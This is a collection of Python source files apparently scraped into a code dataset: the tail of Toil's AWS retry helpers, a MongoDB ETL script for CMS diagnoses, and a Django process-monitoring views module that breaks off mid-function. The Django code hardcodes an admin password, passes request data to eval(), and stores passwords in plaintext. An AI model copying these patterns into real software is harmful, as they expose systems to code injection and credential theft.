https://github.com/BD2KGenomics/toil/issues/978\n return isinstance(e, SSLError) and e.reason == 'DECRYPTION_FAILED_OR_BAD_RECORD_MAC'\n\n\ndef retryable_sdb_errors(e):\n return (sdb_unavailable(e)\n or no_such_sdb_domain(e)\n or connection_reset(e)\n or retryable_ssl_error(e))\n\n\ndef retry_sdb(delays=default_delays, timeout=default_timeout, predicate=retryable_sdb_errors):\n return retry(delays=delays, timeout=timeout, predicate=predicate)\n\n\ndef retryable_s3_errors(e):\n return (isinstance(e, (S3CreateError, S3ResponseError))\n and e.status == 409\n and 'try again' in e.message\n or connection_reset(e)\n or isinstance(e, BotoServerError) and e.status == 500\n or isinstance(e, S3CopyError) and 'try again' in e.message)\n\n\ndef retry_s3(delays=default_delays, timeout=default_timeout, predicate=retryable_s3_errors):\n return retry(delays=delays, timeout=timeout, predicate=predicate)\n\n\ndef region_to_bucket_location(region):\n if region == 'us-east-1':\n return ''\n else:\n return region\n\n\ndef bucket_location_to_region(location):\n if location == '':\n return 'us-east-1'\n else:\n return location\n\n\ndef bucket_location_to_http_url(location):\n if location:\n return 'https://s3-' + location + '.amazonaws.com'\n else:\n return 'https://s3.amazonaws.com'\n","sub_path":"src/toil/jobStores/aws/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":16202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"620616647","text":"import hashlib\nfrom copy import deepcopy\nfrom mysqlQueryResultsMap import resultsMap\nfrom mysqlQueries import queries\nimport recordTemplates\n\nfrom pymongo import *\nmongoCnx = MongoClient('130.85.93.85', 27017)\nmongoDb = mongoCnx[\"CMS\"]\nmongoCollection = mongoDb[\"BeneficiaryRecords\"]\n\nrecords = []\nfor beneficiary in mongoCollection.find():\n diagnoses = []\n for claims in beneficiary[\"INPATIENT_CLAIMS\"].itervalues():\n for claim in claims:\n diagnoses += claim[\"ICD9_DGNS\"]\n for claims in beneficiary[\"OUTPATIENT_CLAIMS\"].itervalues():\n for claim in claims:\n diagnoses += claim[\"ICD9_DGNS\"]\n diagnoses = list(set(diagnoses)) # deduplicate diagnoses list\n records.append({\n \"DESYNPUF_ID\": beneficiary[\"DESYNPUF_ID\"],\n \"DiagnosesSet\": diagnoses\n })\n if len(records) == 1000: # write records in batches of 1000\n mongoDb[\"BeneficiaryDiagnosesSet\"].insert(records)\n records = []\nmongoDb[\"BeneficiaryDiagnosesSet\"].insert(records)\nrecords = []\n","sub_path":"ETL/CMS/extractBenefDiagSet.py","file_name":"extractBenefDiagSet.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"250109235","text":"# coding:utf-8\nimport time\nimport datetime\nimport sys\nimport os\nimport json\nimport random\nimport uuid\nimport xml.dom.minidom\nfrom xml.dom.minidom import parse, parseString\nimport xlrd\nimport xlwt\nimport pymssql\nfrom lxml import etree\nimport re\nimport pdfkit\nimport sys\nimport requests\nfrom operator import itemgetter\nimport subprocess\nimport multiprocessing\nimport decimal\nimport pymysql\nimport psutil\nimport base64\nimport win32api\nimport calendar\nimport socket\nfrom dateutil.relativedelta import relativedelta\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\n\nfrom django.utils.timezone import utc\nfrom django.utils.timezone import localtime\nfrom django.shortcuts import render\nfrom django.contrib import auth\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect, Http404, HttpResponse, JsonResponse, FileResponse\nfrom django.http import StreamingHttpResponse\nfrom django.db.models import Q\nfrom django.db.models import Count\nfrom django.db.models import Sum, Max, Avg, Min\nfrom django.db import connection\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.decorators.cache import cache_page\nfrom django.utils.encoding import escape_uri_path\nfrom django.core.mail import send_mail\nfrom django.forms.models import model_to_dict\nfrom django.template.response import TemplateResponse\nfrom django.views.generic import View\nfrom django.db import transaction\n\nfrom datacenter.tasks import *\nfrom .models import *\nfrom .remote import ServerByPara\nfrom ZDDC import settings\nfrom .funcs import *\nfrom .ftp_file_handler import *\nfrom utils.handle_process import Extract, PIQuery, get_dict_name\nfrom django.shortcuts import render_to_response\n\n\ninfo = {\"webaddr\": \"cv-server\", \"port\": \"81\", \"username\": \"admin\", \"passwd\": \"Admin@2017\", \"token\": \"\",\n \"lastlogin\": 0}\n\n\n\ndef page_not_found(request):\n return render_to_response('404.html')\n\n\ndef page_error(request):\n return render_to_response('500.html')\n\n\ndef report_server(request, funid):\n if request.user.is_authenticated():\n rs = ReportServer.objects.first()\n id, report_server, user_name, password, report_file_path, web_server, ps_script_path = 0, '', '', '', '', '', ''\n if rs:\n id = rs.id\n report_server = rs.report_server\n user_name = rs.username\n password = rs.password\n report_file_path = rs.report_file_path\n web_server = rs.web_server\n ps_script_path = rs.ps_script_path\n\n return render(request, 'report_server.html',\n {'username': request.user.userinfo.fullname, \"pagefuns\": getpagefuns(funid,request),\n 'id': id, 'report_server': report_server, 'user_name': user_name,\n 'password': password, 'report_file_path': report_file_path,\n 'web_server': web_server, 'ps_script_path': ps_script_path\n })\n else:\n return HttpResponseRedirect('/login')\n\n\ndef report_server_save(request):\n if request.user.is_authenticated():\n id = request.POST.get('id', '')\n report_server = request.POST.get('report_server', '')\n username = request.POST.get('username', '')\n password = request.POST.get('password', '')\n report_file_path = request.POST.get('report_file_path', '')\n\n status = 0\n data = ''\n\n try:\n id = int(id)\n except:\n status = 0\n data = '网络连接异常。'\n else:\n if id == 0:\n rs = ReportServer()\n rs.report_server = report_server\n rs.username = username\n rs.password = password\n rs.report_file_path = report_file_path\n rs.save()\n status = 1\n data = '保存成功。'\n else:\n try:\n rs = ReportServer.objects.get(id=id)\n except ReportServer.DoesNotExist as e:\n status = 0\n data = '报表记录不存在。'\n else:\n rs.report_server = report_server\n rs.username = username\n rs.password = password\n rs.report_file_path = report_file_path\n rs.save()\n status = 1\n data = '保存成功。'\n return JsonResponse({\n 'status': status,\n 'data': data\n })\n else:\n return HttpResponseRedirect('/login')\n\n\ndef Digit(digit):\n \"\"\"\n 四舍五入quantize参数\n \"\"\"\n if digit == 0:\n digit = '0'\n elif digit == 1:\n digit = '0.0'\n elif digit == 2:\n digit = '0.00'\n elif digit == 3:\n digit = '0.000'\n elif digit == 4:\n digit = '0.0000'\n elif digit == 5:\n digit = '0.00000'\n elif digit == 6:\n digit = '0.000000'\n else:\n digit = '0.0000000'\n return digit\n\n\nclass DataCenter(View):\n \"\"\"\n 数据服务\n \"\"\"\n\n def get(self, request):\n # 2020-02-20\n result = {}\n target_name = request.GET.get('target_name', '')\n date = request.GET.get('date', '')\n\n if not target_name:\n return JsonResponse({\n 'status': 0,\n 'data': {},\n 'msg': '指标名称未传入。'\n })\n\n try:\n date = datetime.datetime.strptime(date, '%Y-%m-%d')\n\n # >=当天0时 <昨日0时\n end_time = date + datetime.timedelta(days=1)\n except:\n return JsonResponse({\n 'status': 0,\n 'data': {},\n 'msg': '传入时间有误。'\n })\n extract_data = getmodels('Extractdata', str(date.year)).objects.exclude(state='9').filter(datadate__gte=date,\n datadate__lt=end_time,\n target__name=target_name)\n data_list = []\n for ed in extract_data:\n data_list.append({\n 'target_name': ed.target.name,\n 'datadate': ed.datadate,\n 'curvalue': ed.curvalue,\n 'curvaluedate': ed.curvaluedate,\n 'curvaluetext': ed.curvaluetext,\n 'cumulativemonth': ed.cumulativemonth,\n 'cumulativequarter': ed.cumulativequarter,\n 'cumulativehalfyear': ed.cumulativehalfyear,\n 'cumulativeyear': ed.cumulativeyear,\n })\n result['status'] = 1\n result['data'] = data_list\n result['msg'] = '获取数据成功。'\n\n return JsonResponse(result, json_dumps_params={'ensure_ascii': False})\n\n\ndef getmodels(modelname, year):\n try:\n from django.apps import apps\n\n mydata = apps.get_model('__main__', modelname + '_' + year)\n except LookupError:\n if modelname == \"Meterdata\":\n mydata = get_meterdata_model(year)\n elif modelname == \"entrydata\":\n mydata = get_entrydata_model(year)\n elif modelname == \"Extractdata\":\n mydata = get_extractdata_model(year)\n elif modelname == \"Calculatedata\":\n mydata = get_calculatedata_model(year)\n else:\n mydata = get_entrydata_model(year)\n\n if not mydata.is_exists():\n with connection.schema_editor() as schema_editor:\n schema_editor.create_model(mydata)\n return mydata\n\n\ndef get_process_monitor_tree(request):\n if request.user.is_authenticated():\n cycle_id = request.POST.get('cycle_id', '')\n app_id = request.POST.get('app_id', '')\n source_id = request.POST.get('source_id', '')\n index = request.POST.get('index', '')\n all_process_list = []\n try:\n cycle_id = int(cycle_id)\n app_id = int(app_id)\n source_id = int(source_id)\n except ValueError as e:\n print(e)\n targets = Target.objects.filter(operationtype__in=[16, 1]).exclude(state=9).values('source_id', 'adminapp_id',\n 'cycle_id')\n\n def does_it_exist(source, adminapp=None, cycle=None):\n if source and not any([adminapp, cycle]):\n for t in targets:\n if source == t['source_id']:\n return True\n if all([source, adminapp]) and not cycle:\n for t in targets:\n if source == t['source_id'] and adminapp == t['adminapp_id']:\n return True\n if all([source, adminapp, cycle]):\n for t in targets:\n if source == t['source_id'] and adminapp == t['adminapp_id'] and cycle == t['cycle_id']:\n return True\n return False\n\n # 进程监控 >> 数据源配置 >> (指标管理中匹配)应用>> (指标管理中心根据数据源+应用匹配)周期\n # 根节点\n root_info = dict()\n root_info['text'] = \"进程监控\"\n root_info['type'] = 'node'\n\n # 1.数据源管理\n source = Source.objects.exclude(state='9')\n app = App.objects.exclude(state='9')\n cycle = Cycle.objects.exclude(state='9')\n\n variable_info_list = []\n fixed_info_list = []\n for s in source:\n # 指标管理中匹配\n if not s.type:\n if does_it_exist(s.id):\n # 数据源类型\n source_type = \"\"\n try:\n source_type = DictList.objects.get(id=s.sourcetype).name\n except DictList.DoesNotExist as e:\n print(e)\n\n s_info = dict()\n s_info['text'] = s.name\n s_info['type'] = 'node'\n s_info['data'] = {\n 's_id': s.id,\n 's_name': s.name,\n 's_code': s.code,\n 's_type': source_type,\n 'type': 'source'\n }\n s_info['state'] = {'opened': True}\n\n # 2.应用\n a_info_list = []\n for a in app:\n if does_it_exist(s.id, a.id):\n a_info = dict()\n a_info['text'] = a.name\n a_info['type'] = 'node'\n a_info['data'] = {\n 's_id': s.id,\n 's_name': s.name,\n 's_code': s.code,\n 's_type': source_type,\n 'a_id': a.id,\n 'a_name': a.name,\n 'type': 'app'\n }\n a_info['state'] = {'opened': True}\n\n\n # 3.周期\n c_info_list = []\n\n for c in cycle:\n if does_it_exist(s.id, a.id, c.id):\n create_time, last_time, status = '', '', ''\n cp_id = ''\n # 获取进程状态\n cps = ProcessMonitor.objects.filter(source_id=s.id).filter(\n app_admin_id=a.id).filter(\n cycle_id=c.id).exclude(state='9')\n if cps.exists():\n cp = cps[0]\n cp_id = cp.id\n create_time = '{:%Y-%m-%d %H:%M:%S}'.format(\n cp.create_time) if cp.create_time else \"\"\n last_time = '{:%Y-%m-%d %H:%M:%S}'.format(cp.last_time) if cp.last_time else \"\"\n status = cp.status\n if index == \"0\":\n # 更新数据库数据:进程状态\n p_id = int(cp.p_id) if cp.p_id else \"\"\n if p_id:\n py_process = check_py_exists(p_id)\n if not py_process:\n cp.status = \"已关闭\"\n cp.save()\n status = \"已关闭\"\n\n c_info = dict()\n c_info['text'] = c.name\n c_info['type'] = 'file'\n c_info['data'] = {\n 's_id': s.id,\n 's_name': s.name,\n 's_code': s.code,\n 's_type': source_type,\n 'a_name': a.name,\n 'a_id': a.id,\n 'c_id': c.id,\n 'c_name': c.name,\n 'type': 'cycle',\n\n # 主进程id\n 'cp_id': cp_id,\n\n # 进程状态\n 'create_time': create_time,\n 'last_time': last_time,\n 'status': status\n }\n info = {'status': status, 's_id': s.id, 'a_id': a.id, 'c_id': c.id, 'check_type': ''}\n all_process_list.append(info)\n\n c_info['state'] = {'opened': True}\n if cycle_id == c.id and app_id == a.id and source_id == s.id:\n c_info['state']['selected'] = True\n\n # 判断进程状态\n if status != \"运行中\":\n c_info['type'] = 'file_grey'\n a_info['type'] = 'node_grey'\n s_info['type'] = 'node_grey'\n root_info['type'] = 'node_grey'\n c_info_list.append(c_info)\n a_info['children'] = c_info_list\n if a_info['children'] != []:\n a_info_list.append(a_info)\n if a_info_list != []:\n s_info['children'] = a_info_list\n variable_info_list.append(s_info)\n else:\n # 固定节点(数据补取、数据清理、数据服务、短信服务)\n fixed_s_info = dict()\n fixed_s_info['text'] = s.name\n fixed_s_info['type'] = 'file'\n\n # 进程状态\n f_create_time, f_last_time, f_status = '', '', ''\n # 获取进程状态\n f_cps = ProcessMonitor.objects.filter(source_id=s.id).exclude(state='9')\n if f_cps.exists():\n f_cp = f_cps[0]\n f_create_time = '{:%Y-%m-%d %H:%M:%S}'.format(\n f_cp.create_time) if f_cp.create_time else \"\"\n f_last_time = '{:%Y-%m-%d %H:%M:%S}'.format(f_cp.last_time) if f_cp.last_time else \"\"\n f_status = f_cp.status\n if index == \"0\":\n # 更新数据库数据:进程状态\n p_id = int(f_cp.p_id) if f_cp.p_id else \"\"\n if p_id:\n py_process = check_py_exists(p_id)\n if not py_process:\n f_cp.status = \"已关闭\"\n f_cp.save()\n f_status = \"已关闭\"\n\n # 判断进程状态\n if f_status != \"运行中\":\n fixed_s_info['type'] = 'file_grey'\n root_info['type'] = 'node_grey'\n\n fixed_s_info['data'] = {\n 'check_type': s.type,\n\n 'f_s_name': s.name,\n 's_id': s.id,\n # 进程状态\n 'create_time': f_create_time,\n 'last_time': f_last_time,\n 'status': f_status\n }\n info = {'status': f_status, 's_id': s.id, 'check_type': s.type}\n all_process_list.append(info)\n fixed_info_list.append(fixed_s_info)\n\n # 固定进程放在后面\n variable_info_list.extend(fixed_info_list)\n root_info['children'] = variable_info_list\n root_info['state'] = {'opened': True}\n root_info['data'] = {\n 'type': 'root'\n }\n\n tree_data = json.dumps([root_info], ensure_ascii=False)\n return JsonResponse({\n \"ret\": 1,\n \"data\": tree_data,\n \"all_process_list\": all_process_list\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef check_py_exists(pid):\n process = None\n try:\n pid = int(pid)\n if psutil.pid_exists(pid):\n process = psutil.Process(pid=pid)\n if 'python.exe' not in process.name():\n process = None\n except:\n pass\n\n return process\n\n\ndef process_monitor_index(request, funid):\n \"\"\"\n 进程监控\n \"\"\"\n if request.user.is_authenticated():\n # 检测进程是否启动\n process_monitors = ProcessMonitor.objects.exclude(state='9')\n\n shutdown_process_set = set()\n for process_monitor in process_monitors:\n p_id = process_monitor.p_id\n try:\n p_id = int(p_id)\n except ValueError as e:\n shutdown_process_set.add(process_monitor.id)\n else:\n py_process = check_py_exists(p_id)\n if not py_process:\n shutdown_process_set.add(process_monitor.id)\n if shutdown_process_set:\n process_monitors.filter(id__in=shutdown_process_set).update(**{\n 'status': '已关闭', 'create_time': None, 'p_id': ''\n })\n return render(request, 'process_monitor.html',\n {'username': request.user.userinfo.fullname,\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef process_monitor_data(request):\n if request.user.is_authenticated():\n result = []\n p_source = Source.objects.filter(pnode=None).exclude(state=\"9\").filter(type='')\n if p_source.exists():\n p_source = p_source[0]\n else:\n return JsonResponse({\"data\": []})\n all_source = Source.objects.exclude(state=\"9\").filter(pnode=p_source).filter(type='')\n for source in all_source:\n source_type = source.sourcetype\n if source_type:\n source_type = int(source_type)\n try:\n temp_dict_list = DictList.objects.exclude(state=\"9\").get(id=source_type)\n source_type_list = get_select_source_type(temp_source_type=source_type)\n\n result.append({\n \"id\": source.id,\n \"name\": source.name,\n \"code\": source.code,\n \"sourcetype\": source_type,\n \"sourcetype_name\": temp_dict_list.name,\n \"source_type_list\": source_type_list,\n \"create_time\": source.create_time.strftime(\n '%Y-%m-%d %H:%M:%S') if source.create_time else \"未启动\",\n \"last_time\": source.last_time.strftime(\n '%Y-%m-%d %H:%M:%S') if source.last_time else \"未启动\",\n \"status\": source.status if source.status else \"\",\n })\n except Exception as e:\n print(e)\n\n return JsonResponse({\"data\": result})\n\n\ndef handle_process(current_process, handle_type=None):\n \"\"\"\n 操作程序\n 已关闭\n 运行中\n \"\"\"\n tag, res = \"\", \"\"\n\n if handle_type == \"RUN\":\n try:\n process_path = BASE_DIR + os.sep + \"utils\" + os.sep + \"handle_process.py\" + \" {0}\".format(\n current_process.id)\n\n # 启动前,清理当前未关闭的进程,避免同ID的进程在取数\n python_process = [p for p in psutil.process_iter() if 'python' in p.name()]\n\n for pp in python_process:\n try:\n # ['C:\\\\Python35\\\\python.exe', '-i', 'D:\\\\Pros\\\\ZDDC\\\\utils\\\\handle_process.py', '14']\n if 'handle_process.py' in pp.as_dict()['cmdline'][2] and current_process.id == int(\n pp.as_dict()['cmdline'][3]):\n pp.terminate()\n except:\n pass\n\n win32api.ShellExecute(0, 'open', 'python', r'-i {process_path}'.format(process_path=process_path), '', 0)\n res = \"程序启动成功。\"\n tag = 1\n except Exception as e:\n print(e)\n res = \"程序启动失败\"\n if tag == 1:\n # 修改数据库进程状态\n current_process.status = \"运行中\"\n current_process.create_time = datetime.datetime.now()\n current_process.save()\n elif handle_type == \"DESTROY\":\n pid = current_process.p_id\n if pid:\n py_process = check_py_exists(pid)\n if py_process:\n py_process.terminate()\n\n # 修改数据库进程状态\n current_process.status = \"已关闭\"\n current_process.create_time = None\n current_process.p_id = \"\"\n current_process.save()\n res = \"程序终止成功。\"\n tag = 1\n else:\n res = \"未找到该进程\"\n else:\n res = \"该进程不存在。\"\n else:\n res = \"程序执行类型不符合。\"\n\n return (tag, res)\n\n\ndef process_run(request):\n if request.user.is_authenticated():\n tag, res = 0, \"\"\n\n source_id = request.POST.get(\"source_id\", \"\")\n app_id = request.POST.get(\"app_id\", \"\")\n cycle_id = request.POST.get(\"cycle_id\", \"\")\n operate = request.POST.get(\"operate\", \"\")\n check_type = request.POST.get(\"check_type\", \"\")\n try:\n source_id = int(source_id)\n app_id = int(app_id)\n cycle_id = int(cycle_id)\n except ValueError as e:\n print(e)\n\n # 进程操作记入日志\n def record_log(app_id, source_id, cycle_id, msg):\n try:\n log = LogInfo()\n log.source_id = source_id\n log.app_id = app_id\n log.cycle_id = cycle_id\n log.create_time = datetime.datetime.now()\n log.content = msg\n log.save()\n except:\n pass\n\n # 固定进程\n current_process = ProcessMonitor.objects.filter(source_id=source_id).exclude(state='9')\n\n # 动态进程\n if not check_type:\n current_process = ProcessMonitor.objects.filter(source_id=source_id).filter(app_admin_id=app_id).filter(\n cycle_id=cycle_id).exclude(state='9')\n\n if current_process.exists():\n current_process = current_process[0]\n\n def get_running_info(current_process):\n # 获取运行状态与启动时间\n status = current_process.status\n create_time = current_process.create_time\n return {\n 'status': status,\n 'create_time': '{:%Y-%m-%d %H:%M:%S}'.format(create_time) if create_time else ''\n }\n\n if operate == 'start':\n # 查看是否运行中\n if current_process.status == \"运行中\":\n tag = 0\n res = \"请勿重复执行该程序。\"\n else:\n tag, res = handle_process(current_process, handle_type=\"RUN\")\n record_log(app_id, source_id, cycle_id, '进程启动成功。')\n elif operate == 'stop':\n if current_process.status != \"运行中\":\n tag = 0\n res = \"当前进程未在运行中。\"\n else:\n tag, res = handle_process(current_process, handle_type=\"DESTROY\")\n record_log(app_id, source_id, cycle_id, '进程关闭成功。')\n elif operate == 'restart':\n if current_process.status != \"运行中\":\n tag = 0\n res = \"当前进程未在运行中,请启动程序。\"\n else:\n tag, res = handle_process(current_process, handle_type=\"DESTROY\")\n if tag == 1:\n tag, res = handle_process(current_process, handle_type=\"RUN\")\n record_log(app_id, source_id, cycle_id, '进程重启成功。')\n else:\n tag = 0\n res = \"关闭进程失败。\"\n else:\n tag = 0\n res = \"未接收到操作指令。\"\n return JsonResponse({\n 'tag': tag,\n 'res': res,\n 'data': get_running_info(current_process)\n })\n else:\n current_process = ProcessMonitor()\n current_process.source_id = source_id\n if not check_type:\n current_process.app_admin_id = app_id\n current_process.cycle_id = cycle_id\n current_process.save()\n tag, res = handle_process(current_process, handle_type=\"RUN\")\n record_log(app_id, source_id, cycle_id, '进程启动成功。')\n return JsonResponse({\n 'tag': tag,\n 'res': res,\n 'data': ''\n })\n\n\ndef process_run_all(request):\n if request.user.is_authenticated():\n tag = 0\n res = \"\"\n operate = request.POST.get(\"operate\", \"\")\n all_process_data = request.POST.get(\"all_process_data\", \"\")\n all_process_data = json.loads(all_process_data)\n\n for i in all_process_data:\n check_type = i['check_type']\n if not check_type:\n try:\n app_id = int(i['a_id'])\n cycle_id = int(i['c_id'])\n source_id = int(i['s_id'])\n except:\n pass\n else:\n try:\n source_id = int(i['s_id'])\n except:\n pass\n\n # 进程操作记入日志\n def record_log_all(app_id, source_id, cycle_id, msg):\n try:\n log = LogInfo()\n log.source_id = source_id\n log.app_id = app_id\n log.cycle_id = cycle_id\n log.create_time = datetime.datetime.now()\n log.content = msg\n log.save()\n except:\n pass\n\n # 固定进程\n current_process = ProcessMonitor.objects.filter(source_id=source_id).exclude(state='9')\n\n # 动态进程\n if not check_type:\n current_process = ProcessMonitor.objects.filter(source_id=source_id).filter(app_admin_id=app_id).filter(\n cycle_id=cycle_id).exclude(state='9')\n\n if current_process.exists():\n current_process = current_process[0]\n if operate == 'all_start':\n # 查看是否运行中\n if current_process.status == \"运行中\":\n continue\n else:\n tag, res = handle_process(current_process, handle_type=\"RUN\")\n record_log_all(app_id, source_id, cycle_id, '进程启动成功。')\n elif operate == 'all_stop':\n if current_process.status != \"运行中\":\n continue\n else:\n tag, res = handle_process(current_process, handle_type=\"DESTROY\")\n record_log_all(app_id, source_id, cycle_id, '进程关闭成功。')\n else:\n tag = 0\n res = \"未接收到操作指令。\"\n\n else:\n current_process = ProcessMonitor()\n current_process.source_id = source_id\n if not check_type:\n current_process.app_admin_id = app_id\n current_process.cycle_id = cycle_id\n current_process.save()\n tag, res = handle_process(current_process, handle_type=\"RUN\")\n record_log_all(app_id, source_id, cycle_id, '进程启动成功。')\n return JsonResponse({\n 'tag': tag,\n 'res': res,\n 'data': ''\n })\n\n\ndef pm_target_data(request):\n \"\"\"\n 根据应用、数据源、周期 过滤出所有指标\n :param request:\n :return:\n \"\"\"\n if request.user.is_authenticated():\n app_id = request.GET.get('app_id', '')\n source_id = request.GET.get('source_id', '')\n cycle_id = request.GET.get('cycle_id', '')\n\n result = []\n\n supplement_status = '0' # 1启动成功 0完成 2失败\n try:\n app_id = int(app_id)\n source_id = int(source_id)\n cycle_id = int(cycle_id)\n except ValueError as e:\n print(e)\n else:\n targets = Target.objects.exclude(state='9').filter(\n Q(adminapp_id=app_id) & Q(source_id=source_id) & Q(cycle_id=cycle_id)).select_related('storage')\n\n for target in targets:\n result.append({\n 'id': target.id,\n 'target_code': target.code,\n 'target_name': target.name,\n 'source_content': target.source_content,\n 'storage_table_name': target.storage.tablename if target.storage else '',\n 'storage_fields': target.storagefields[:-1] if target.storagefields.endswith(\n ',') else target.storagefields\n })\n\n # 补取进程的状态 1/0/2\n try:\n primary_process = ProcessMonitor.objects.exclude(state='9').get(app_admin_id=app_id,\n source_id=source_id,\n cycle_id=cycle_id)\n except ProcessMonitor.DoesNotExist as e:\n print(e)\n else:\n supplement_process = SupplementProcess.objects.exclude(state='9').filter(\n primary_process=primary_process).last()\n supplement_status = supplement_process.p_state if supplement_process else '0'\n\n return JsonResponse({\n \"data\": result,\n 'supplement_status': supplement_status\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef get_exception_data(request):\n if request.user.is_authenticated():\n result = []\n app_id = request.GET.get('app_id', '')\n source_id = request.GET.get('source_id', '')\n cycle_id = request.GET.get('cycle_id', '')\n\n try:\n app_id = int(app_id)\n source_id = int(source_id)\n cycle_id = int(cycle_id)\n except ValueError as e:\n print(e)\n else:\n t_now = datetime.datetime.now()\n\n t_before = t_now - datetime.timedelta(days=90)\n t_after = t_now + datetime.timedelta(days=90)\n\n exceptions = ExceptionData.objects.filter(\n app_id=app_id, source_id=source_id, cycle_id=cycle_id\n ).filter(extract_error_time__range=[t_before, t_after]).exclude(state=9).order_by('-id')\n for num, exception in enumerate(exceptions):\n result.append({\n 'id': exception.id,\n 'target_name': exception.target.name if exception.target else '',\n 'extract_error_time': '{:%Y-%m-%d %H:%M:%S}'.format(\n exception.extract_error_time) if exception.extract_error_time else '',\n 'supplement_times': exception.supplement_times,\n 'last_supplement_time': '{:%Y-%m-%d %H:%M:%S}'.format(\n exception.last_supplement_time) if exception.last_supplement_time else '',\n })\n if num > 98:\n break\n return JsonResponse({\"data\": result})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef exception_data_del(request):\n if request.user.is_authenticated():\n status = 1\n data = ''\n id = request.POST.get('id', '')\n try:\n id = int(id)\n ex_data = ExceptionData.objects.get(id=id)\n except:\n status = 0\n data = '该异常信息不存在。'\n else:\n ex_data.state = \"9\"\n ex_data.save()\n status = 1\n data = '删除成功。'\n\n return JsonResponse({\n 'status': status,\n 'data': data\n })\n\n\ndef get_log_info(request):\n if request.user.is_authenticated():\n result = []\n app_id = request.GET.get('app_id', '')\n source_id = request.GET.get('source_id', '')\n cycle_id = request.GET.get('cycle_id', '')\n\n try:\n app_id = int(app_id)\n source_id = int(source_id)\n cycle_id = int(cycle_id)\n except ValueError as e:\n print(e)\n else:\n t_now = datetime.datetime.now()\n\n t_before = t_now - datetime.timedelta(days=90)\n t_after = t_now + datetime.timedelta(days=90)\n\n log_infos = LogInfo.objects.filter(\n Q(app_id=app_id) & Q(source_id=source_id) & Q(cycle_id=cycle_id)\n ).filter(create_time__range=[t_before, t_after]).order_by('-create_time')\n\n for num, log_info in enumerate(log_infos):\n result.append({\n 'id': num + 1,\n 'create_time': '{:%Y-%m-%d %H:%M:%S}'.format(\n log_info.create_time) if log_info.create_time else '',\n 'content': log_info.content,\n })\n if num > 98:\n break\n return JsonResponse({\"data\": result})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef target_test(request):\n \"\"\"\n 选择数据源测试取数\n :param request:\n :return:\n \"\"\"\n if request.user.is_authenticated():\n selectedtarget = request.POST.get('selectedtarget', '[]')\n result = {\n \"status\": 1,\n \"data\": [],\n }\n\n class DecimalEncoder(json.JSONEncoder):\n \"\"\"\n 解决Decimal无法序列化问题\n \"\"\"\n\n def default(self, obj):\n if isinstance(obj, decimal.Decimal):\n return float(obj)\n return super(DecimalEncoder, self).default(obj)\n\n try:\n now_time = datetime.datetime.now()\n\n targets = Target.objects.filter(id__in=eval(selectedtarget))\n tmp_list = []\n for target in targets:\n ret = Extract.getDataFromSource(target, now_time)\n result_list = ret['result']\n error = ret['error']\n\n if error:\n tmp_list.append({\n \"target_id\": target.id,\n \"target_code\": target.code,\n \"target_name\": target.name,\n \"data\": error,\n \"status\": 'ERROR'\n })\n else:\n tmp_list.append({\n \"target_id\": target.id,\n \"target_code\": target.code,\n \"target_name\": target.name,\n \"data\": result_list,\n \"status\": 'SUCCESS'\n })\n except Exception as e:\n print(e)\n result['status'] = 0\n else:\n result['data'] = json.dumps(tmp_list, cls=DecimalEncoder)\n\n \"\"\"\n [{\n \"target_id\": \"\",\n \"target_code\": \"\",\n \"target_name\": \"\",\n \"data\": [...],\n \"status\": \"SUCCESS\"\n }, {\n \"target_id\": \"\",\n \"target_code\": \"\",\n \"target_name\": \"\",\n \"data\": \"\",\n \"status\": \"ERROR\"\n }]\n\n \"\"\"\n return JsonResponse(result)\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef supplement_process(request):\n \"\"\"\n 选择数据源指定区间补取数据\n :param request:\n :return:\n \"\"\"\n if request.user.is_authenticated():\n result = {\n 'status': 1,\n 'data': '成功启动补取。'\n }\n\n selectedtarget = request.POST.get('selectedtarget', '[]')\n start_time = request.POST.get('start_time', '')\n end_time = request.POST.get('end_time', '')\n cp_id = request.POST.get('cp_id', '')\n\n try:\n selectedtarget = eval(selectedtarget)\n except:\n pass\n\n try:\n cp_id = int(cp_id)\n except:\n result['status'] = 0\n result['data'] = '启动补取失败。'\n else:\n if not start_time:\n result['status'] = 0\n result['data'] = '开始时间未填写。'\n elif not end_time:\n result['status'] = 0\n result['data'] = '结束时间未填写。'\n else:\n # 先存入数据库\n try:\n start_time = datetime.datetime.strptime(start_time, '%Y-%m-%d %H:%M:%S')\n except Exception as e:\n print(e)\n start_time = None\n try:\n end_time = datetime.datetime.strptime(end_time, '%Y-%m-%d %H:%M:%S')\n except Exception as e:\n print(e)\n end_time = None\n if all([start_time, end_time]):\n if start_time > end_time:\n return JsonResponse({\n 'status': 0,\n 'data': '开始时间不得迟于结束时间。'\n })\n\n supplement_process = SupplementProcess()\n supplement_process.start_time = start_time\n supplement_process.end_time = end_time\n supplement_process.p_state = '1'\n supplement_process.primary_process_id = cp_id\n supplement_process.setup_time = datetime.datetime.now()\n supplement_process.save()\n\n tmp_selectedtarget = ''\n\n if type(selectedtarget) == tuple:\n for st in selectedtarget:\n tmp_selectedtarget += str(st) + '^'\n else:\n tmp_selectedtarget = str(selectedtarget)\n\n process_path = BASE_DIR + os.sep + \"utils\" + os.sep + \"handle_process.py\" + \" {0} {1}\".format(\n cp_id, tmp_selectedtarget if not tmp_selectedtarget.endswith('^') else tmp_selectedtarget[:-1]\n )\n\n try:\n win32api.ShellExecute(0, 'open', 'python', r'-i {process_path}'.format(process_path=process_path),\n '', 0)\n except:\n result['status'] = 0\n result['data'] = '启动补取失败。'\n\n return JsonResponse(result)\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef get_supplement_process_info(request):\n \"\"\"\n 获取补取进程信息\n :param request:\n :return:\n \"\"\"\n if request.user.is_authenticated():\n cp_id = request.POST.get('cp_id', '')\n result = {\n 'status': 1,\n 'data': ''\n }\n try:\n cp_id = int(cp_id)\n except:\n result['status'] = 